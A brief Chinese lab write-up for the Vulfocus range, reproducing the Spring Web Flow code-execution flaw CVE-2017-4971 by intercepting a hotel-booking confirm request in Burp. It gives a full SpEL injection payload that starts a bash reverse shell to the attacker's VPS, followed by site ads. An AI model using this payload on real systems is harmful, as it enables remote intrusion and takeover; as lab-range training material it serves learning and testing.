Vulfocus靶场 | spring 代码执行 (CVE-2017-4971)
漏洞描述
Spring Web Flow建立在Spring MVC之上,并允许实现Web应用程序的“流”
由于没有明确指定相关 model 的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行的漏洞
漏洞复现
访问页面点击左上角“login”
然后随便选一个用户密码登录
直接点击“find hotels”
随便选一个宾馆
内容随便填,然后提交,confirm时使用Burp截断数据包
在请求包最后加上你VPS的ip和端口
&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/ip/port+0>%261")).start()=vulfocus
然后发包即可
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧